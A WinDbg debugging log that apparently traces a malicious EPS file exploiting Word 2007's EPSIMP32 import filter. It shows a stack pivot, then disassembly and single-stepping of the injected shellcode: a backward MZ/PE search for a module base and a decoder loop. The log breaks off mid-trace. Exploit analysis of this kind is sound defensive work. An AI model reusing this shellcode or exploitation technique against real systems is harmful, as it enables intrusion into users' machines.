Description
*** wait with pending attach
************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 2fe80000 2fee6000 C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
ModLoad: 77570000 776ac000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 77350000 77424000 C:\Windows\system32\kernel32.dll
ModLoad: 75880000 758ca000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 76390000 76430000 C:\Windows\system32\ADVAPI32.dll
ModLoad: 760d0000 7617c000 C:\Windows\system32\msvcrt.dll
ModLoad: 76450000 76469000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76180000 76221000 C:\Windows\system32\RPCRT4.dll
ModLoad: 6c660000 6c6fb000 C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
ModLoad: 755b0000 755fc000 C:\Windows\system32\apphelp.dll
ModLoad: 6d390000 6d40b000 C:\Windows\AppPatch\AcSpecfc.DLL
ModLoad: 75590000 755ab000 C:\Windows\system32\SspiCli.dll
ModLoad: 6f1e0000 6f264000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll
ModLoad: 76240000 7628e000 C:\Windows\system32\GDI32.dll
ModLoad: 76290000 76359000 C:\Windows\system32\USER32.dll
ModLoad: 75b60000 75b6a000 C:\Windows\system32\LPK.dll
ModLoad: 75f60000 75ffd000 C:\Windows\system32\USP10.dll
ModLoad: 70260000 702d9000 C:\Windows\system32\mscms.dll
ModLoad: 74d40000 74d57000 C:\Windows\system32\USERENV.dll
ModLoad: 75680000 7568b000 C:\Windows\system32\profapi.dll
ModLoad: 776c0000 77717000 C:\Windows\system32\SHLWAPI.dll
ModLoad: 75cf0000 75e4c000 C:\Windows\system32\ole32.dll
ModLoad: 76700000 7734a000 C:\Windows\system32\SHELL32.dll
ModLoad: 739c0000 739f2000 C:\Windows\system32\WINMM.dll
ModLoad: 6c820000 6c907000 C:\Windows\system32\DDRAW.dll
ModLoad: 744d0000 744d6000 C:\Windows\system32\DCIMAN32.dll
ModLoad: 759c0000 75b5d000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 75900000 75927000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 76000000 7608f000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 75860000 75872000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 73f50000 73f63000 C:\Windows\system32\dwmapi.dll
ModLoad: 710d0000 710e2000 C:\Windows\system32\MPR.dll
ModLoad: 77720000 7779b000 C:\Windows\system32\COMDLG32.dll
ModLoad: 76430000 7644f000 C:\Windows\system32\IMM32.dll
ModLoad: 75b70000 75c3c000 C:\Windows\system32\MSCTF.dll
ModLoad: 76090000 760c5000 C:\Windows\system32\WS2_32.dll
ModLoad: 76230000 76236000 C:\Windows\system32\NSI.dll
ModLoad: 6ded0000 6e110000 C:\Windows\system32\msi.dll
ModLoad: 64020000 65168000 C:\Program Files\Microsoft Office\Office12\wwlib.dll
ModLoad: 66e80000 67de8000 C:\Program Files\Microsoft Office\Office12\oart.dll
ModLoad: 685a0000 69627000 C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll
ModLoad: 6c920000 6c9f7000 C:\Program Files\Microsoft Office\Office12\1033\wwintl.dll
ModLoad: 74330000 74370000 C:\Windows\system32\uxtheme.dll
ModLoad: 744e0000 7467e000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32.dll
ModLoad: 62f90000 635e5000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL
ModLoad: 6c560000 6c61a000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
ModLoad: 6fc30000 6fc47000 C:\Windows\system32\DavClnt.DLL
ModLoad: 6fae0000 6fae8000 C:\Windows\system32\DAVHLPR.dll
ModLoad: 5e420000 5edfd000 C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL
ModLoad: 6d2e0000 6d32a000 C:\Windows\system32\mscoree.dll
ModLoad: 6ca00000 6ca7d000 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
ModLoad: 74a50000 74a59000 C:\Windows\system32\VERSION.dll
ModLoad: 75600000 7560c000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 6fff0000 70041000 C:\Windows\system32\Winspool.DRV
ModLoad: 6cb20000 6cbda000 C:\Windows\system32\spool\DRIVERS\W32X86\3\unidrvui.dll
ModLoad: 6c520000 6c558000 C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdui.DLL
ModLoad: 76670000 766f3000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 683c0000 684c5000 C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll
ModLoad: 743a0000 74495000 C:\Windows\system32\propsys.dll
ModLoad: 73d00000 73d21000 C:\Windows\system32\ntmarta.dll
ModLoad: 75ca0000 75ce5000 C:\Windows\system32\WLDAP32.dll
ModLoad: 6a1a0000 6a2f5000 C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll
ModLoad: 751d0000 751e7000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 74eb0000 74eeb000 C:\Windows\system32\rsaenh.dll
ModLoad: 75670000 7567e000 C:\Windows\system32\RpcRtRemote.dll
ModLoad: 75610000 7566f000 C:\Windows\system32\SXS.DLL
ModLoad: 6c460000 6c517000 C:\Program Files\Microsoft Office\Office12\msproof6.dll
ModLoad: 68050000 680d7000 C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80.dll
ModLoad: 3f100000 3f401000 C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL
ModLoad: 66db0000 66e71000 C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdrv.dll
ModLoad: 6e7b0000 6e7c4000 C:\Windows\system32\FontSub.dll
(cd0.a04): Break instruction exception - code 80000003 (first chance)
eax=7ffd4000 ebx=00000000 ecx=00000000 edx=7760f125 esi=00000000 edi=00000000
eip=775a40f0 esp=04b4f78c ebp=04b4f7b8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
775a40f0 cc int 3
0:010> ba r4 ZwProtectVirtualMemory
0:010> g
(cd0.e50): Unknown exception - code e0000002 (first chance)
(cd0.e50): Unknown exception - code e0000002 (first chance)
ModLoad: 62e00000 62f8b000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL
ModLoad: 73e00000 73e0d000 C:\Windows\system32\WTSAPI32.DLL
ModLoad: 75690000 756b9000 C:\Windows\system32\WINSTA.dll
ModLoad: 6fad0000 6fad9000 C:\Windows\system32\LINKINFO.dll
ModLoad: 6e8a0000 6e910000 C:\Windows\system32\ntshrui.dll
ModLoad: 75330000 75349000 C:\Windows\system32\srvcli.dll
ModLoad: 6e940000 6e94b000 C:\Windows\system32\cscapi.dll
ModLoad: 73900000 7390a000 C:\Windows\system32\slc.dll
ModLoad: 63bb0000 63c1f000 C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT -
Breakpoint 0 hit
eax=000000b8 ebx=04371f01 ecx=775b5f18 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed2a0 esp=002bc7a0 ebp=002bc7dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3e:
63bed2a0 8975d4 mov dword ptr [ebp-2Ch],esi ss:0023:002bc7b0=00000000
0:000> ub eip
EPSIMP32!RegisterPercentCallback+0x15c23:
63bed285 3b482c cmp ecx,dword ptr [eax+2Ch]
63bed288 7d21 jge EPSIMP32!RegisterPercentCallback+0x15c49 (63bed2ab)
63bed28a 8b5024 mov edx,dword ptr [eax+24h]
63bed28d 8b12 mov edx,dword ptr [edx]
63bed28f 8b5220 mov edx,dword ptr [edx+20h]
63bed292 035028 add edx,dword ptr [eax+28h]
63bed295 c745d003000000 mov dword ptr [ebp-30h],3
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx]
0:000> bc 0
0:000> bp 63bed29c "u edx+ecx;r;g;"
0:000> bp ntdll!NtCreateEvent+0x5 ".if(eax == 0x45){g;}"
0:000> g
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000 add byte ptr [eax],al
775b5f1d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc718 ebp=002bc754 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
775b5f34 c20800 ret 8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc6a4 ebp=002bc6e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1c=00
ntdll!ZwProtectVirtualMemory+0x1:
775b5f19 d7 xlat byte ptr [ebx]
775b5f1a 0000 add byte ptr [eax],al
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
eax=043720b0 ebx=04371f01 ecx=775b5f19 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f19=d7
ntdll!ZwProtectVirtualMemory+0x2:
775b5f1a 0000 add byte ptr [eax],al
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1a edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1a=00
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000 add byte ptr [eax],al
775b5f1d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
775b5f34 c20800 ret 8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1c=00
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=000000d7 ebx=04371fa0 ecx=061e0f08 edx=0011f5c8 esi=0011ea78 edi=00000000
eip=775b55ad esp=061e0f62 ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!ZwCreateEvent+0x5:
775b55ad ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
0:000> dd esp
061e0f62 061e2f08 ffffffff 061e0108 061e010c
061e0f72 00000040 061e0110 00000000 00000000
061e0f82 00000000 00000000 00000000 00000000
061e0f92 00000000 00000000 00000000 00000000
061e0fa2 00000000 00000000 00000000 00000000
061e0fb2 00000000 00000000 00000000 00000000
061e0fc2 00000000 00000000 00000000 00000000
061e0fd2 00000000 00000000 00000000 00000000
0:000> g poi(esp)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f08 esp=061e0f7a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f08 60 pushad
0:000> uf eip
Flow analysis was incomplete, some code may be missing
061e2f08 60 pushad
061e2f09 64a100000000 mov eax,dword ptr fs:[00000000h]
061e2f0f 8b4004 mov eax,dword ptr [eax+4]
061e2f12 250000ffff and eax,0FFFF0000h
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh
061e2f1c 7517 jne 061e2f35 Branch
061e2f1e 81783c00020000 cmp dword ptr [eax+3Ch],200h
061e2f25 730e jae 061e2f35 Branch
061e2f27 8b503c mov edx,dword ptr [eax+3Ch]
061e2f2a 03d0 add edx,eax
061e2f2c 66813a5045 cmp word ptr [edx],4550h
061e2f31 7502 jne 061e2f35 Branch
061e2f33 eb07 jmp 061e2f3c Branch
061e2f35 2d00000100 sub eax,10000h
061e2f3a ebdb jmp 061e2f17 Branch
061e2f3c 8b7a1c mov edi,dword ptr [edx+1Ch]
061e2f3f 8b722c mov esi,dword ptr [edx+2Ch]
061e2f42 03f0 add esi,eax
061e2f44 03fe add edi,esi
061e2f46 83ed04 sub ebp,4
061e2f49 8b4d00 mov ecx,dword ptr [ebp]
061e2f4c 3bce cmp ecx,esi
061e2f4e 7218 jb 061e2f68 Branch
061e2f50 3bcf cmp ecx,edi
061e2f52 7314 jae 061e2f68 Branch
061e2f54 8079fdff cmp byte ptr [ecx-3],0FFh
061e2f58 750e jne 061e2f68 Branch
061e2f5a 8079fe50 cmp byte ptr [ecx-2],50h
061e2f5e 7508 jne 061e2f68 Branch
061e2f60 8079ff10 cmp byte ptr [ecx-1],10h
061e2f64 7502 jne 061e2f68 Branch
061e2f66 eb02 jmp 061e2f6a Branch
061e2f68 ebdc jmp 061e2f46 Branch
061e2f6a 896c2418 mov dword ptr [esp+18h],ebp
061e2f6e 61 popad
061e2f6f 87e1 xchg esp,ecx
061e2f71 60 pushad
061e2f72 8bec mov ebp,esp
061e2f74 e800000000 call 061e2f79
061e2f79 8b3424 mov esi,dword ptr [esp]
061e2f7c 8d642404 lea esp,[esp+4]
061e2f80 81ee71000000 sub esi,71h
061e2f86 81c6a0000000 add esi,0A0h
061e2f8c 68dc000000 push 0DCh
061e2f91 59 pop ecx
061e2f92 8d3c8e lea edi,[esi+ecx*4]
061e2f95 6a1f push 1Fh
061e2f97 58 pop eax
061e2f98 d12f shr dword ptr [edi],1
061e2f9a d116 rcl dword ptr [esi],1
061e2f9c 83c604 add esi,4
061e2f9f 48 dec eax
061e2fa0 7506 jne 061e2fa8 Branch
061e2fa2 6a1f push 1Fh
061e2fa4 58 pop eax
061e2fa5 83c704 add edi,4
061e2fa8 7177 jno 061e3021 Branch
061e2faa b245 mov dl,45h
061e2fac 2c98 sub al,98h
061e2fae c52d86c52d0e lds ebp,fword ptr ds:[0E2DC586h]
061e2fb4 c529 lds ebp,fword ptr [ecx]
061e2fb6 844521 test byte ptr [ebp+21h],al
061e2fb9 90 nop
061e2fba c50d409c3600 lds ecx,fword ptr ds:[369C40h]
061e2fc0 3980ba04403c cmp dword ptr [eax+3C4004BAh],eax
061e2fc6 023b add bh,byte ptr [ebx]
061e2fc8 803100 xor byte ptr [ecx],0
061e2fcb 3a88409c2680 cmp cl,byte ptr [eax-7FD963C0h]
061e2fd1 29803aef403c sub dword ptr [eax+3C40EF3Ah],eax
061e2fd7 022b add ch,byte ptr [ebx]
061e2fd9 802100 and byte ptr [ecx],0
061e2fdc 3a6b29 cmp ch,byte ptr [ebx+29h]
061e2fdf 7428 je 061e3009 Branch
061e2fe0 2800 sub byte ptr [eax],al
061e2fe1 0000 add byte ptr [eax],al
061e2fe3 00c5 add ch,al
061e2fee 292b sub dword ptr [ebx],ebp
061e2ff0 2b740000 sub esi,dword ptr [eax+eax]
061e2ff4 0080451e92c1 add byte ptr [eax-3E6DE1BBh],al
061e2ffa e301 jecxz 061e2ffd Branch
061e2ffc c1737e5c sal dword ptr [ebx+7Eh],5Ch
061e2ffd 737e jae 061e307d Branch
061e2fff 5c pop esp
061e3000 aa stos byte ptr es:[edi]
061e3001 aa stos byte ptr es:[edi]
061e3002 aa stos byte ptr es:[edi]
061e3003 2afe sub bh,dh
061e3005 99 cdq
061e3006 e424 in al,24h
061e3008 f9 stc
061e3009 d7 xlat byte ptr [ebx]
061e300a c01f33 rcr byte ptr [edi],33h
061e300d 3333 xor esi,dword ptr [ebx]
061e300f 333a xor edi,dword ptr [edx]
061e3011 fb sti
061e3012 c16382c4 shl dword ptr [ebx-7Eh],0C4h
061e3016 3e7ef9 ht jle 061e3012 Branch
061e3019 d7 xlat byte ptr [ebx]
061e301a c01f33 rcr byte ptr [edi],33h
061e301d 3333 xor esi,dword ptr [ebx]
061e301f 333a xor edi,dword ptr [edx]
061e3021 fb sti
061e3022 c17782c4 sal dword ptr [edi-7Eh],0C4h
061e3026 3e7cc5 ht jl 061e2fee Branch
061e3029 22fe and bh,dh
061e302b 45 inc ebp
061e302c 2afc sub bh,ah
061e302e 15682fafad adc eax,0ADAF2F68h
061e3033 64e1aa loope 061e2fe0 Branch
061e3036 45 inc ebp
061e3037 7640 jbe 061e3079 Branch
061e3039 62627f bound esp,qword ptr [edx+7Fh]
061e3079 008023323a28 add byte ptr [eax+283A3223h],al
061e307d 3a28 cmp ch,byte ptr [eax]
061e307f 39b7b1203232 cmp dword ptr [edi+323220B1h],esi
061e3085 b9b2393980 mov ecx,803939B2h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f09 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f09 64a100000000 mov eax,dword ptr fs:[00000000h] fs:003b:00000000=002bc95c
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=002bc95c ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f0f esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f0f 8b4004 mov eax,dword ptr [eax+4] ds:0023:002bc960=63c102c8
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c102c8 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f12 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f12 250000ffff and eax,0FFFF0000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63c10000=8bff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a06
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a06
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63c00000=c63b
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63bf0000=0fc0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63be0000=75ff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
